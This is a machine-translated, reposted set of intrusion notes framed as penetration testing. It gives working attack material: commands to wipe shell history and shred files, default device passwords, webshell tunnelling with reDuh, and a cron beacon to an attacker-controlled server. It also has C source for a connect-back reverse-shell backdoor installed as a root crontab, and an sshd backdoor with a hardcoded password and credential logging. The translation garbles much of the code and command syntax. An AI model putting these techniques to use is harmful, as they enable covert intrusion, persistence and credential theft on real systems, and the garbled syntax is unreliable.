Solution for non-su interaction after the backdoors are connected to nc after the nst rebound + Intranet penetration test notes

Source: Internet
Author: User

The nst bounce backdoor cannot be used for su interaction after connecting to nc. the following error is returned:
Standard in must be a tty
Solution:
Python-c import pty; pty. spawn ("/bin/sh ")
The shell can be used for su interaction.

Ps: Several noteworthy cases encountered in the recent penetration test, which are recorded as follows:

1. history is not recorded:
Unset history histfile histsave histzone history histlog; export HISTFILE =/dev/null; export HISTSIZE = 0; export HISTFILESIZE = 0

2. history
N: Number, which indicates 'list the last n command list!
-C: removes all history content in the current shell.
-A: adds the newly added history command to histfiles. If histfiles is not added,
Write by default ~ /. Bash_history
-R: Read the content of histfiles to the history Memory of the current shell;
-W: Write the Current history Memory to histfiles!

3. The correct method for deleting files is to use shred.
Shred-n 31337-z-u file_to_delete

4. Intranet ssh ing
You can use the ssh tunnel proxy to access: plink root @ public ip-D 127.0.0.1: 8080 and then set the ie proxy socks5 proxy to 127.0.0.1: 8080 to access the Intranet: http: // 192.168.0.1

5. Changed the port ing tool proxy written in c ++, two versions, one with parameters. Read the configuration file. The source code will be published later (see the following for the source code ).
/Usr/local/bin/proxy 2080 192.168.0.7 80 ing port 80 of port 0.7 to port 2080 of the local machine.

6. In Windows, the SuperO Doctor III management background can be used with VNC: (management tools with ultra-micro motherboard, a bit similar to IPMI)
It is worth noting that, because SuperO Doctor III uses Xitami web server, TridiaVNC, SndMail 2.1, and WMI (Windows Management Instrumentation) Core 1.5, therefore, you must use different account passwords to modify the settings. System logon and Xitami web server default account password is ADMIN/ADMIN, while TridiaVNC password is abcde, not the Windows System Administrator account.

7. Welcome to EIS System!
Change the default Telnet user name and password of the device to admin/admin.

8. reDuh, a good tool, can map the Intranet port to the http service of the http or https Port:
The server has aps, jsp, and php versions. Download: http://www.sensepost.com/research/reduh. Let's briefly describe this tool.
First upload the server: Access jsp "> http://www.xxx.com/shell/developerh.jspas:
[Revoke herror] Undefined Request
It indicates that the job is normal. Local:
D: ToolseDuh.2eDuhClient> java export hclient www.xxx.com 80/shell/export H. jsp
[Info] Querying remote JSP for usable remote RPC port
[Info] Remote RPC port chosenas 42001
[Info] Attempting to start using H. jsp from www.xxx.com: 80/shell/using H. jsp and set
Ting remote RPC port to 42001. Please wait...
[InfoL] reDuhClient service listener started on local port 1010
[InfoL] Caught new service connection on port 1010
Default local listening port 1010:
D: Tools> nc-vv 127.0.0.1 1010
DNS fwd/rev mismatch: localhost! = Vitter
Localhost [127.0.0.1] 1010 (?) Open
Welcome to the specified H command line
> [CreateTunnel] 5900: 192.168.0.3: 5900
Successfully bound locally to port 5900. Awaiting connections.
If this prompt is displayed, the [createTunnel] locally mapped port: mapped Intranet ip Address: mapped Intranet ip Port
Then, you can use vnc to connect to port 5900 of 127.0.0.1 to the server that attacks 192.168.0.3 on the Intranet.

9. How to confirm the ip address if the ip address is not fixed:
My practice is to run a script in crond on the attacked machine to regularly access a jsp file I wrote.
[Root @ cactiez etc] # cat/etc/cron. hourly/curl
#! /Bin/sh
/Usr/bin/curl http://xxx.xxx.com/ip/getip.jsp

The jsp code is as follows:
---------------------------- Code split line -----------------------------
<% @ Page contentType = "text/html; charset = GB2312" %>
<% @ Page language = "java" %>
<% @ Page import = "java. io. *" %>
<%
String str = request. getRemoteAddr ();
Java. text. SimpleDateFormat formatter = new java. text. SimpleDateFormat ("yyyy-MM-dd HH: mm: ss ");
Java. util. Date currentTime = new java. util. Date ();
String str_date1 = formatter. format (currentTime );
String agent = request. getHeader ("user-agent ");
String nameOfTextFile = "/usr/local/www/home/default-web/ip.txt ";
Try {
PrintWriter pw = new PrintWriter (new FileOutputStream (nameOfTextFile ));
Pw. println (str_date1 );
Pw. println (agent );
Pw. println (str );
Pw. close ();
} Catch (IOException e ){
Out. println (e. getMessage ());
}
%>
---------------------------- Code end split line -----------------------------
The IP address is recorded in the/usr/local/www/home/default-web/ip.txt file. The format is as follows:
15:19:23
Curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
123.123.123.254

10. How to stop apache after webshell returns the backdoor:
By python-c import pty; pty. spawn ("/bin/sh") obtains a shell that can interact with each other. With the root password, the shell can be su, but the httpd cannot be stopped, because the parent process of this shell is httpd, if the httpd is stopped, the backdoor will be directly suspended. You can run crond to get the shell and do not run it using webshell. In this shell, stop httpd (because the Intranet server segment is only mapped to port 80 of this ip address, now port 80 needs to be mapped to the gateway over the Intranet. You can directly remotely manage the device and hack into other Intranet servers after DMZ is enabled ).
Local: nc-l-p 5555
On the server:
[Root @ cactiez etc] # cat/home/www/haha. c
---------------------------- Code split line -----------------------------
# Include <stdio. h>
# Include <sys/types. h>
# Include <sys/socket. h>
# Include <unistd. h>
# Include <fcntl. h>
# Include <netinet/in. h>
# Include <netdb. h>
Int fd, sock;
Int port = 5555;
Struct sockaddr_in addr;
Char mesg [] = ": Connect-Back Backdoor: CMD :";
Char shell [] = "/bin/sh ";
Int main (int argc, char * argv []) {
While (argc <2 ){
Fprintf (stderr, "% s <ip>", argv [0]);
Exit (0 );}
Addr. sin_family = AF_INET;
Addr. sin_port = htons (port );
Addr. sin_addr.s_addr = inet_addr (argv [1]);
Fd = socket (AF_INET, SOCK_STREAM, 0 );
Connect (fd, (struct sockaddr *) & addr, sizeof (addr ));
Send (fd, mesg, sizeof (mesg), 0 );
Dup2 (fd, 0 );
Dup2 (fd, 1 );
Dup2 (fd, 2 );
Execl (shell, "in. telnetd", 0 );
Close (fd );
Return 1;
}
---------------------------- Code end split line -----------------------------
[Root @ cactiez etc] # gcc-o/bin/haha/home/www/haha. c
[Root @ cactiez etc] # mkdir/etc/cr_m
[Root @ cactiez etc] # cp/home/www/si/etc/cr_m/
[Root @ cactiez etc] # chmod + x/etc/cr_m/si

[Root @ cactiez etc] # cat/etc/cr_m/si
#! /Bin/sh
/Bin/haha xxx. xx

Append a crontab for execution every minute:
[Root @ cactiez etc] # echo "*/1 ***** root run-parts/etc/cr_m">/etc/crontab
[Root @ cactiez etc] # cat/etc/crontab
SHELL =/bin/bash
PATH =/sbin:/bin:/usr/sbin:/usr/bin
MAILTO = root
HOME =/
# Run-parts
01 *** root run-parts/etc/cron. hourly
02 4 *** root run-parts/etc/cron. daily
22 4 ** 0 root run-parts/etc/cron. weekly
42 4 1 ** root run-parts/etc/cron. monthly
*/1 ***** root run-parts/etc/cr_m
One minute later, the local nc will be connected, and then stop httpd:
[Root @ cactiez etc] # cat/root/s. sh
#! /Bin/sh
/Sbin/service httpd stop
/Usr/local/bin/proxy 80 192.168.0.1 80
Sleep 600
Killall-9 proxy
/Sbin/service httpd restart
[Root @ cactiez etc] #/root/s. sh &
Now port 80 of the Public ip address connected to this machine is already port 80 of the gateway 192.168.0.1. Set DMZ quickly to handle the Intranet machine.

11. sshd BACKDOOR:
After patching, You need to modify two files: version. h and Des. h.
In version. h:
# Define SSH_VERSION "OpenSSH_4.3"
The version number in the quotation marks.
In Des. h:
# Define _ SECRET_PASSWD "passwerd"
# Define _ LOG_DIR "/dev/hdal"
# Define _ S_LOG "slog"
# Define _ C_LOG "clog"
Password and password recording path and file

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.